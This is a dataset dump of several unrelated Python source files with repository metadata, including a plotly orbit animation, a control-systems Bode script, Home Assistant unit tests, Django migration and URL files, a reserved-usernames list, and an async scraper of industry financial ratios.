yorbit = np.sin(t)
zorbit = np.cos(gamma)*np.cos(t)

# Axis limits with 1.5 units of padding around the orbit.
xm = np.min(xorbit) - 1.5
xM = np.max(xorbit) + 1.5
ym = np.min(yorbit) - 1.5
yM = np.max(yorbit) + 1.5
zm = np.min(zorbit) - 1.5
zM = np.max(zorbit) + 1.5

# Subsample the 1000-point orbit down to ~100 animation frames.
skip = int(0.01*len(t))
xanimation = xorbit[0:len(t):skip]
yanimation = yorbit[0:len(t):skip]
zanimation = zorbit[0:len(t):skip]
nb_frames = len(xanimation)

fig = go.Figure(frames=[go.Frame(data=go.Scatter3d(
    x=[xanimation[k]],
    y=[yanimation[k]],
    z=[zanimation[k]],
    mode="markers",
    marker=dict(color="red", size=10),
    ),
    name=str(k) # you need to name the frame for the animation to behave properly
    )
    for k in range(nb_frames)]) #Loop through all frames

# Add data to be displayed before animation starts.
# BUG FIX: the initial marker previously used yanimation[1] and zanimation[2]
# (copy-paste indices), so it did not coincide with frame 0; all three
# coordinates now use index 0.
fig.add_trace(go.Scatter3d(
    x=[xanimation[0]],
    y=[yanimation[0]],
    z=[zanimation[0]],
    mode="markers",
    marker=dict(color="red", size=10)
    ))

##Add Full orbit
fig.add_trace(go.Scatter3d(
    x=xorbit,
    y=yorbit,
    z=zorbit,
    mode="lines",line=dict(width=2, color="blue")
    ))

# One slider step per named frame; clicking a step jumps straight to it.
sliders = [{"pad": {"b": 10, "t": 60},
            "len": 0.9,
            "x": 0.1,
            "y": 0,
            "steps": [{"args": [[f.name], frame_args(0)],
                       "label": str(k),
                       "method": "animate",
                       }
                      for k, f in enumerate(fig.frames)],}]

# Layout
fig.update_layout(
    title='3D Orbit',
    width=600,
    height=600,
    scene=dict(
        xaxis=dict(range=[xm,xM]),
        yaxis=dict(range=[ym,yM]),
        zaxis=dict(range=[zm,zM],autorange=False),
        aspectratio=dict(x=1, y=1, z=1),
    ),
    updatemenus = [{
        "buttons": [{
            "args": [None, frame_args(50)],
            "label": "▶", # play symbol
            "method": "animate",},
            {"args": [[None], frame_args(0)],
            "label": "◼", # pause symbol
            "method": "animate",},
        ],
        "direction": "left",
        "pad": {"r": 10, "t": 70},
        "type": "buttons",
        "x": 0.1,
        "y": 0,
    }],
    sliders=sliders
)
fig.show()
|
[
"[email protected]"
] | |
860b34a29b05c457ba52d4db8cddb722d4684c96
|
ba7c4862dfbc9d0469f389c0cdb3fed01f99ebe3
|
/controls/bode/lead_lag_compensation.py
|
d939d88fe4fb919bdb196d213749e47cd1052ba7
|
[] |
no_license
|
cmontalvo251/Python
|
293cbdf8832d7637d5c0b31eadd02d3ccf2f2c05
|
2b12ce043ee41e08537cfb62301c6a55d4661e04
|
refs/heads/master
| 2023-06-22T21:50:21.225067 | 2023-06-14T13:42:16 | 2023-06-14T13:42:16 | 229,313,158 | 8 | 3 | null | 2021-07-31T16:01:54 | 2019-12-20T18:03:52 |
Python
|
UTF-8
|
Python
| false | false | 314 |
py
|
import control as ctl
import numpy as np
import matplotlib.pyplot as plt

plt.close("all")

# Pendulum parameters: natural frequency wn = sqrt(g/L).
g = 9.81
L = 2.0
wn = np.sqrt(g/L)

# Plant: undamped second-order transfer function 1 / (s^2 + wn^2).
G = ctl.tf([1],[1,0,wn**2])
print(G)

# Lead compensator: zero at s = -1, pole at s = -100.
C = ctl.tf([1,1],[1,100])
print(C)

ctl.bode(C*G,dB=True)
plt.grid()

# BUG FIX: removed a stray backtick at the start of this line, which made
# the whole script a SyntaxError.
gm,pm,wg,wp = ctl.margin(C*G)
print(gm,pm,wg,wp)

ctl.rlocus(C*G)
plt.show()
|
[
"[email protected]"
] | |
e57fbf4a5c2ba63f9063c9c5e88e364270db2ecb
|
1d928c3f90d4a0a9a3919a804597aa0a4aab19a3
|
/python/core/2016/8/test_device_sun_light_trigger.py
|
88c0bae60ec02bf1f88b3d8c7d9fb1e9ee41e430
|
[] |
no_license
|
rosoareslv/SED99
|
d8b2ff5811e7f0ffc59be066a5a0349a92cbb845
|
a062c118f12b93172e31e8ca115ce3f871b64461
|
refs/heads/main
| 2023-02-22T21:59:02.703005 | 2021-01-28T19:40:51 | 2021-01-28T19:40:51 | 306,497,459 | 1 | 1 | null | 2020-11-24T20:56:18 | 2020-10-23T01:18:07 | null |
UTF-8
|
Python
| false | false | 3,997 |
py
|
"""The tests device sun light trigger component."""
# pylint: disable=too-many-public-methods,protected-access
import os
import unittest
import homeassistant.loader as loader
from homeassistant.const import CONF_PLATFORM, STATE_HOME, STATE_NOT_HOME
from homeassistant.components import (
device_tracker, light, sun, device_sun_light_trigger)
from homeassistant.helpers import event_decorators
from tests.common import (
get_test_config_dir, get_test_home_assistant, ensure_sun_risen,
ensure_sun_set)
# Path of the known-devices YAML file inside the test config directory;
# written in setUpModule and removed again in tearDownModule.
KNOWN_DEV_YAML_PATH = os.path.join(get_test_config_dir(),
                                   device_tracker.YAML_DEVICES)
def setUpModule(): # pylint: disable=invalid-name
    """Write a device tracker known devices file to be used."""
    # Register two tracked devices ('device_1'/'device_2') in the YAML file
    # so the tests below can toggle their home/not-home state.
    device_tracker.update_config(
        KNOWN_DEV_YAML_PATH, 'device_1', device_tracker.Device(
            None, None, True, 'device_1', 'DEV1',
            picture='http://example.com/dev1.jpg'))
    device_tracker.update_config(
        KNOWN_DEV_YAML_PATH, 'device_2', device_tracker.Device(
            None, None, True, 'device_2', 'DEV2',
            picture='http://example.com/dev2.jpg'))

def tearDownModule(): # pylint: disable=invalid-name
    """Remove device tracker known devices file."""
    os.remove(KNOWN_DEV_YAML_PATH)
class TestDeviceSunLightTrigger(unittest.TestCase):
    """Test the device sun light trigger module."""

    def setUp(self): # pylint: disable=invalid-name
        """Setup things to be run when tests are started."""
        self.hass = get_test_home_assistant()
        event_decorators.HASS = self.hass
        # Use the fake device-tracker scanner; DEV1 starts out home.
        self.scanner = loader.get_component(
            'device_tracker.test').get_scanner(None, None)
        self.scanner.reset()
        self.scanner.come_home('DEV1')
        loader.get_component('light.test').init()
        # Bring up the three components the trigger depends on, all backed
        # by their 'test' platforms (sun with elevation 0).
        self.assertTrue(device_tracker.setup(self.hass, {
            device_tracker.DOMAIN: {CONF_PLATFORM: 'test'}
        }))
        self.assertTrue(light.setup(self.hass, {
            light.DOMAIN: {CONF_PLATFORM: 'test'}
        }))
        self.assertTrue(sun.setup(
            self.hass, {sun.DOMAIN: {sun.CONF_ELEVATION: 0}}))

    def tearDown(self): # pylint: disable=invalid-name
        """Stop everything that was started."""
        self.hass.stop()
        event_decorators.HASS = None

    def test_lights_on_when_sun_sets(self):
        """Test lights go on when there is someone home and the sun sets."""
        self.assertTrue(device_sun_light_trigger.setup(
            self.hass, {device_sun_light_trigger.DOMAIN: {}}))
        # Start from daylight with the lights off, then let the sun set.
        ensure_sun_risen(self.hass)
        light.turn_off(self.hass)
        self.hass.pool.block_till_done()
        ensure_sun_set(self.hass)
        self.hass.pool.block_till_done()
        self.assertTrue(light.is_on(self.hass))

    def test_lights_turn_off_when_everyone_leaves(self): \
            # pylint: disable=invalid-name
        """Test lights turn off when everyone leaves the house."""
        light.turn_on(self.hass)
        self.hass.pool.block_till_done()
        self.assertTrue(device_sun_light_trigger.setup(
            self.hass, {device_sun_light_trigger.DOMAIN: {}}))
        # Mark the group of all tracked devices as away.
        self.hass.states.set(device_tracker.ENTITY_ID_ALL_DEVICES,
                             STATE_NOT_HOME)
        self.hass.pool.block_till_done()
        self.assertFalse(light.is_on(self.hass))

    def test_lights_turn_on_when_coming_home_after_sun_set(self): \
            # pylint: disable=invalid-name
        """Test lights turn on when coming home after sun set."""
        # Night, lights off, then device_2 arrives home.
        light.turn_off(self.hass)
        ensure_sun_set(self.hass)
        self.hass.pool.block_till_done()
        self.assertTrue(device_sun_light_trigger.setup(
            self.hass, {device_sun_light_trigger.DOMAIN: {}}))
        self.hass.states.set(
            device_tracker.ENTITY_ID_FORMAT.format('device_2'), STATE_HOME)
        self.hass.pool.block_till_done()
        self.assertTrue(light.is_on(self.hass))
|
[
"[email protected]"
] | |
69982d63985cd4d63ce892aefb685f295fde5def
|
892c7bd301eeadf57b546f039faf499448112ddc
|
/organizacion/migrations/0003_auto_20160803_2128.py
|
bd7797b580ff3d4c5a0737d23d02286217f6d4cc
|
[
"MIT"
] |
permissive
|
ErickMurillo/aprocacaho
|
beed9c4b031cf26a362e44fc6a042b38ab246c27
|
eecd216103e6b06e3ece174c89d911f27b50585a
|
refs/heads/master
| 2022-11-23T15:03:32.687847 | 2019-07-01T19:16:37 | 2019-07-01T19:16:37 | 53,867,804 | 0 | 1 |
MIT
| 2022-11-22T01:02:51 | 2016-03-14T15:23:39 |
HTML
|
UTF-8
|
Python
| false | false | 1,552 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-08-03 21:28
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated Django migration (1.9.7).

    Only changes human-readable verbose_name labels and the 'status'
    choices; no column types or data are altered. Auto-generated files
    like this should not be edited by hand.
    """

    dependencies = [
        ('organizacion', '0002_auto_20160609_1700'),
    ]

    operations = [
        migrations.AlterField(
            model_name='comercializacion',
            name='no_socias_corriente',
            field=models.FloatField(verbose_name='Mujeres (Fermentado)'),
        ),
        migrations.AlterField(
            model_name='comercializacion',
            name='no_socios_corriente',
            field=models.FloatField(verbose_name='Hombres (Fermentado)'),
        ),
        migrations.AlterField(
            model_name='comercializacion',
            name='socias_corriente',
            field=models.FloatField(verbose_name='Mujeres (Corriente)'),
        ),
        migrations.AlterField(
            model_name='comercializacion',
            name='socios_corriente',
            field=models.FloatField(verbose_name='Hombres (Corriente)'),
        ),
        migrations.AlterField(
            model_name='documentacion',
            name='fecha',
            field=models.DateField(verbose_name='Fecha de elaboraci\xf3n o actualizaci\xf3n'),
        ),
        migrations.AlterField(
            model_name='organizacion',
            name='status',
            field=models.IntegerField(choices=[(1, 'ONG'), (2, 'Cooperativa'), (3, 'Asociaci\xf3n'), (4, 'Proyectos')], verbose_name='Estatus Legal'),
        ),
    ]
|
[
"[email protected]"
] | |
d025d430eb3b45553a6b5e7add7305b8e93a97c6
|
467f9e8d2181c6cfba59afc4c596e328fa1ddbbc
|
/oby/settings/forbidden_usernames.py
|
f7b8c6e44e149795e97c2dea999d8fd44158bad8
|
[] |
no_license
|
jphalis/oby
|
40af213349d7d68e748d34b25c14653876874110
|
20d4b43f7918c98044f82e7bdb9c34dcc10a7994
|
refs/heads/master
| 2021-05-21T11:13:58.612908 | 2016-06-15T22:05:20 | 2016-06-15T22:05:20 | 36,603,721 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 10,055 |
py
|
FORBIDDEN_USERNAMES = [
# Generic reserved words
'about',
'account',
'activate',
'activity',
'add',
'admin',
'administrator',
'advertiser',
'advertisers',
'ajaxsearch',
'all',
'announcements',
'anywhere',
'api',
'app',
'apps',
'archive',
'archives',
'auth',
'authentication',
'badge',
'blog',
'business',
'businesses',
'button',
'buttons',
'cache',
'cancel',
'careers',
'cart',
'changelog',
'checkout',
'codereview',
'compare',
'config',
'configuration',
'connect',
'contact',
'contacts',
'create',
'delete',
'device',
'devices',
'direct_message',
'direct_messages',
'documentation',
'download',
'downloads',
'edit',
'email',
'employment',
'enterprise',
'faq',
'favorite',
'favorites',
'feed',
'feedback',
'feeds',
'find',
'find_users',
'fleet',
'fleets',
'follow',
'follower',
'followers',
'following',
'follows',
'friend',
'friends',
'gist',
'grappelli',
'group',
'groups',
'hashtag',
'hashtags',
'help',
'hide',
'home',
'hosting',
'hostmaster',
'idea',
'ideas',
'inbox',
'index',
'info',
'invitations',
'invite',
'is',
'it',
'job',
'jobs',
'json',
'language',
'languages',
'lists',
'login',
'logout',
'logs',
'mail',
'map',
'maps',
'me',
'media',
'mention',
'mentions',
'message',
'messages',
'mine',
'mis',
'news',
'newsletter',
'notify',
'notification',
'notifications',
'oauth',
'oauth_clients',
'offers',
'openid',
'order',
'orders',
'organizations',
'payitforward',
'pif',
'plans',
'popular',
'position',
'positions',
'post',
'postmaster',
'privacy',
'privacy_policy',
'projects',
'put',
'recruitment',
'register',
'remove',
'replies',
'reply',
'root',
'rss',
'rules',
'sales',
'save',
'search',
'security',
'sessions',
'setting',
'settings',
'shop',
'signin',
'signout',
'signup',
'sitemap',
'ssl',
'ssladmin',
'ssladministrator',
'sslwebmaster',
'statistics',
'status',
'stories',
'styleguide',
'subscribe',
'subscriptions',
'support',
'supporters',
'supportdetails',
'supporting',
'support_details',
'sysadmin',
'sysadministrator',
'terms',
'terms_of_use',
'timeline',
'tour',
'translations',
'trends',
'unfollow',
'unsubscribe',
'update',
'url',
'user',
'username',
'verified',
'verify',
'weather',
'webmaster',
'widget',
'widgets',
'wiki',
'ww',
'www',
'wwww',
'xfn',
'xml',
'xmpp',
'yaml',
'yml',
# Top 50 languages by speaking population
'chinese',
'mandarin',
'spanish',
'english',
'bengali',
'hindi',
'portuguese',
'russian',
'japanese',
'german',
'wu',
'javanese',
'korean',
'french',
'vietnamese',
'telugu',
'chinese',
'marathi',
'tamil',
'turkish',
'urdu',
'min_nan',
'jinyu',
'gujarati',
'polish',
'arabic',
'ukrainian',
'italian',
'xiang',
'malayalam',
'hakka',
'kannada',
'oriya',
'panjabi',
'sunda',
'panjabi',
'romanian',
'bhojpuri',
'azerbaijani',
'farsi',
'maithili',
'hausa',
'arabic',
'burmese',
'serbo_croatian',
'gan',
'awadhi',
'thai',
'dutch',
'yoruba',
'sindhi',
# Country TLDs
'ac', # Ascension Island
'ad', # Andorra
'ae', # United Arab Emirates
'af', # Afghanistan
'ag', # Antigua and Barbuda
'ai', # Anguilla
'al', # Albania
'am', # Armenia
'an', # Netherlands Antilles
'ao', # Angola
'aq', # Antarctica
'ar', # Argentina
'as', # American Samoa
'at', # Austria
'au', # Australia
'aw', # Aruba
'ax', # and
'az', # Azerbaijan
'ba', # Bosnia and Herzegovina
'bb', # Barbados
'bd', # Bangladesh
'be', # Belgium
'bf', # Burkina Faso
'bg', # Bulgaria
'bh', # Bahrain
'bi', # Burundi
'bj', # Benin
'bm', # Bermuda
'bn', # Brunei Darussalam
'bo', # Bolivia
'br', # Brazil
'bs', # Bahamas
'bt', # Bhutan
'bv', # Bouvet Island
'bw', # Botswana
'by', # Belarus
'bz', # Belize
'ca', # Canada
'cc', # Cocos (Keeling) Islands
'cd', # Democratic Republic of the Congo
'cf', # Central African Republic
'cg', # Republic of the Congo
'ch', # Switzerland
'ci', # Ca'te d'Ivoire
'ck', # Cook Islands
'cl', # Chile
'cm', # Cameroon
'cn', # People's Republic of China
'co', # Colombia
'cr', # Costa Rica
'cs', # Czechoslovakia
'cu', # Cuba
'cv', # Cape Verde
'cx', # Christmas Island
'cy', # Cyprus
'cz', # Czech Republic
'dd', # East Germany
'de', # Germany
'dj', # Djibouti
'dk', # Denmark
'dm', # Dominica
'do', # Dominican Republic
'dz', # Algeria
'ec', # Ecuador
'ee', # Estonia
'eg', # Egypt
'eh', # Western Sahara
'er', # Eritrea
'es', # Spain
'et', # Ethiopia
'eu', # European Union
'fi', # Finland
'fj', # Fiji
'fk', # Falkland Islands
'fm', # Federated States of Micronesia
'fo', # Faroe Islands
'fr', # France
'ga', # Gabon
'gb', # United Kingdom
'gd', # Grenada
'ge', # Georgia
'gf', # French Guiana
'gg', # Guernsey
'gh', # Ghana
'gi', # Gibraltar
'gl', # Greenland
'gm', # The Gambia
'gn', # Guinea
'gp', # Guadeloupe
'gq', # Equatorial Guinea
'gr', # Greece
'gs', # South Georgia and the South Sandwich Islands
'gt', # Guatemala
'gu', # Guam
'gw', # Guinea-Bissau
'gy', # Guyana
'hk', # Hong Kong
'hm', # Heard Island and McDonald Islands
'hn', # Honduras
'hr', # Croatia
'ht', # Haiti
'hu', # Hungary
'id', # Indonesia
'ie', # Republic of Ireland Northern Ireland
'il', # Israel
'im', # Isle of Man
'in', # India
'io', # British Indian Ocean Territory
'iq', # Iraq
'ir', # Iran
'is', # Iceland
'it', # Italy
'je', # Jersey
'jm', # Jamaica
'jo', # Jordan
'jp', # Japan
'ke', # Kenya
'kg', # Kyrgyzstan
'kh', # Cambodia
'ki', # Kiribati
'km', # Comoros
'kn', # Saint Kitts and Nevis
'kp', # Democratic People's Republic of Korea
'kr', # Republic of Korea
'kw', # Kuwait
'ky', # Cayman Islands
'kz', # Kazakhstan
'la', # Laos
'lb', # Lebanon
'lc', # Saint Lucia
'li', # Liechtenstein
'lk', # Sri Lanka
'lr', # Liberia
'ls', # Lesotho
'lt', # Lithuania
'lu', # Luxembourg
'lv', # Latvia
'ly', # Libya
'ma', # Morocco
'mc', # Monaco
'md', # Moldova
'me', # Montenegro
'mg', # Madagascar
'mh', # Marshall Islands
'mk', # Republic of Macedonia
'ml', # Mali
'mm', # Myanmar
'mn', # Mongolia
'mo', # Macau
'mp', # Northern Mariana Islands
'mq', # Martinique
'mr', # Mauritania
'ms', # Montserrat
'mt', # Malta
'mu', # Mauritius
'mv', # Maldives
'mw', # Malawi
'mx', # Mexico
'my', # Malaysia
'mz', # Mozambique
'na', # Namibia
'nc', # New Caledonia
'ne', # Niger
'nf', # Norfolk Island
'ng', # Nigeria
'ni', # Nicaragua
'nl', # Netherlands
'no', # Norway
'np', # Nepal
'nr', # Nauru
'nu', # Niue
'nz', # New Zealand
'om', # Oman
'pa', # Panama
'pe', # Peru
'pf', # French Polynesia
'pg', # Papua New Guinea
'ph', # Philippines
'pk', # Pakistan
'pl', # Poland
'pm', # Saint-Pierre and Miquelon
'pn', # Pitcairn Islands
'pr', # Puerto Rico
'ps', # Palestinian territories
'pt', # Portugal
'pw', # Palau
'py', # Paraguay
'qa', # Qatar
're', # RA<copyright symbol>union
'ro', # Romania
'rs', # Serbia
'ru', # Russia
'rw', # Rwanda
'sa', # Saudi Arabia
'sb', # Solomon Islands
'sc', # Seychelles
'sd', # Sudan
'se', # Sweden
'sg', # Singapore
'sh', # Saint Helena
'si', # Slovenia
'sj', # Svalbard and Jan Mayen Islands
'sk', # Slovakia
'sl', # Sierra Leone
'sm', # San Marino
'sn', # Senegal
'so', # Somalia
'sr', # Suriname
'ss', # South Sudan
'st', # SAEo TomA<copyright symbol> and PrAncipe
'su', # Soviet Union
'sv', # El Salvador
'sy', # Syria
'sz', # Swaziland
'tc', # Turks and Caicos Islands
'td', # Chad
'tf', # French Southern and Antarctic Lands
'tg', # Togo
'th', # Thailand
'tj', # Tajikistan
'tk', # Tokelau
'tl', # East Timor
'tm', # Turkmenistan
'tn', # Tunisia
'to', # Tonga
'tp', # East Timor
'tr', # Turkey
'tt', # Trinidad and Tobago
'tv', # Tuvalu
'tw', # Republic of China (Taiwan)
'tz', # Tanzania
'ua', # Ukraine
'ug', # Uganda
'uk', # United Kingdom
'us', # United States of America
'uy', # Uruguay
'uz', # Uzbekistan
'va', # Vatican City
'vc', # Saint Vincent and the Grenadines
've', # Venezuela
'vg', # British Virgin Islands
'vi', # United States Virgin Islands
'vn', # Vietnam
'vu', # Vanuatu
'wf', # Wallis and Futuna
'ws', # Samoa
'ye', # Yemen
'yt', # Mayotte
'yu', # Yugoslavia
'za', # South Africa
'zm', # Zambia
'zw' # Zimbabwe
]
|
[
"[email protected]"
] | |
d8e6ca33f5737e8e3a8c6b75975ab03d158cca5c
|
97221d2166bc075d83c64d346434c11f11f44007
|
/vmscope/accounts/urls.py
|
65fb3fa431f1bd1f5a11e0e591f2d309cd887dc6
|
[] |
no_license
|
likit/vmscope-django
|
a89aba3bd0d8abfc0d154be5872a7206fe1778fb
|
9b2c315c049d240764892e718c1d49962d4935f4
|
refs/heads/master
| 2022-12-09T05:59:31.234466 | 2021-01-11T15:20:09 | 2021-01-11T15:20:09 | 143,836,786 | 0 | 0 | null | 2022-12-08T02:20:57 | 2018-08-07T07:32:37 |
Python
|
UTF-8
|
Python
| false | false | 215 |
py
|
# URL configuration for the accounts app: user registration and profile editing.
from django.urls import path
from .views import SignUpView, update_profile
urlpatterns = [
    path('signup/', SignUpView.as_view(), name='signup'),  # user registration (class-based view)
    path('edit_profile/', update_profile, name='edit_profile')  # edit own profile (function view)
]
|
[
"[email protected]"
] | |
d5014679f0e7629571ed4e5ec13dc761302636a4
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_293/ch87_2020_05_12_23_44_25_135873.py
|
5916eb298f5abbe724807df98f3a1a378325eeec
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 243 |
py
|
# Compute and print the grand total of the barbecue shopping list.
# Each whitespace-separated record in churras.txt looks like
# "<item>,<quantity>,<unit_price>".
with open('churras.txt', 'r') as arquivo:
    registros = arquivo.read().split()

total = sum(int(campos[1]) * float(campos[2])
            for campos in (registro.split(",") for registro in registros))
print(total)
|
[
"[email protected]"
] | |
fd99b671f08d3b5252eed81c98ca24bff841fff4
|
1d2542fbc29c52ccd125c48ab957790ba2640e87
|
/holdle/asyncio_spider.py
|
077ca19872a83d7946eaa3654389ca5f90ec8b03
|
[] |
no_license
|
sixuerain/CrawlMan
|
0a6c9b26f6e4e469b7b04dee82b93eeff3a026ae
|
5b525417dd87d4f5db9b46b428001dd4c8a24d29
|
refs/heads/master
| 2023-03-18T11:00:16.297194 | 2021-02-26T08:22:54 | 2021-02-26T08:22:54 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,525 |
py
|
# -*- coding: utf-8 -*-
# website: http://30daydo.com
# @Time : 2020/9/22 10:07
# Asynchronously crawl the industry index page and its per-industry listing pages
import sys
sys.path.append('..')
import asyncio
import datetime
import aiohttp
import re
import time
from parsel import Selector
from configure.settings import DBSelector
from common.BaseService import BaseService
# Politeness delay in seconds (appears unused in this chunk — TODO confirm callers).
SLEEP = 2
# Desktop Firefox UA plus a Chinese-first Accept-Language header, so holdle.com
# serves the pages the XPath expressions below were written against.
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0',
           'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2'}
# Entry points: the industry index page, and the site root used to resolve the
# relative industry links scraped from it.
URL_MAP = {'home_page': 'https://holdle.com/stocks/industry', 'base': 'https://holdle.com'}
class AsyncMongo():
    """Async helper that writes crawl results into the `db_stock` Mongo database."""
    def __init__(self):
        # DBSelector comes from the project's configure.settings; async_type=True
        # presumably returns a motor-style async client — TODO confirm.
        self.DB = DBSelector()
        self.client = self.DB.mongo(location_type='qq', async_type=True)
        self.db = self.client['db_stock']
    async def update(self, table,data):
        """Insert `data` (a list of documents) into collection `table`.

        NOTE(review): despite the name, this inserts new documents
        (insert_many); it does not update existing ones.
        """
        self.doc= self.db[table]
        await self.doc.insert_many(data)
class Holdle(BaseService):
    """Crawler for holdle.com: fetches every industry page concurrently and
    persists six per-industry financial-ratio tables via AsyncMongo."""
    def __init__(self):
        super(Holdle, self).__init__()
        self.data_processor = AsyncMongo()
        # One name per HTML table on an industry page, in page order; each
        # name doubles as the Mongo collection the table's rows go into.
        self.tables_list =['ROE','Cash_Ratio','Gross_Margin','Operation_Margin','Net_Profit_Ratio','Dividend_ratio']
    async def home_page(self):
        """Fetch the industry index, then crawl all industry pages concurrently."""
        start = time.time()
        async with aiohttp.ClientSession() as session:
            async with session.get(url=URL_MAP['home_page'], headers=headers) as response:
                html = await response.text()  # awaits until the whole body is received
                resp = Selector(text=html)
                industries = resp.xpath('//ul[@class="list-unstyled"]/a')
                task_list = []
                for industry in industries:
                    json_data = {}
                    industry_url = industry.xpath('.//@href').extract_first()
                    industry_name = industry.xpath('.//li/text()').extract_first()
                    # Drop stray '-' characters and surrounding whitespace
                    # from the scraped industry name.
                    industry_name = industry_name.replace('-', '').strip()
                    json_data['industry_url'] = industry_url
                    json_data['industry_name'] = industry_name
                    # Schedule one crawl task per industry; all tasks share
                    # the single ClientSession.
                    task = asyncio.ensure_future(self.detail_list(session, industry_url, json_data))
                    task_list.append(task)
                await asyncio.gather(*task_list)
        end = time.time()
        print(f'time used {end - start}')
    async def detail_list(self, session, url, json_data):
        """Fetch one industry page (relative `url`) and hand it to parse_detail."""
        async with session.get(URL_MAP['base'] + url, headers=headers) as response:
            # NOTE(review): rebinds `response` from the response object to its body text.
            response = await response.text()
            await self.parse_detail(response, json_data)
    async def parse_detail(self, html, json_data=None):
        """Parse the six ratio tables on an industry page and persist each.

        Raises ValueError when the page does not contain exactly six tables
        (layout change or error page).
        """
        resp = Selector(text=html)
        industry=json_data['industry_name']
        tables = resp.xpath('//table[@class="table table-bordered"]')
        if len(tables)!=6:
            raise ValueError
        # `table` is the collection name from tables_list; tables[index] is the
        # HTML table at the same position — the two are matched by page order.
        for index,table in enumerate(self.tables_list):
            rows = tables[index].xpath('.//tr')
            result = []
            for row in rows[1:]:  # skip the header row
                stock_name = row.xpath('.//td[1]/text()').extract_first()
                value = row.xpath('.//td[2]/text()').extract_first()
                value = float(value)  # raises ValueError on non-numeric cells
                d={'industry':industry,'name':stock_name,'value':value,'crawltime':datetime.datetime.now()}
                result.append(d)
            await self.data_processor.update(table,result)
# Module-level entry point: the crawl starts as soon as this file is imported
# or run (no `if __name__ == '__main__'` guard).
app = Holdle()
loop = asyncio.get_event_loop()
# Drive the crawl coroutine to completion; the event loop is left open afterwards.
loop.run_until_complete(app.home_page())
|
[
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.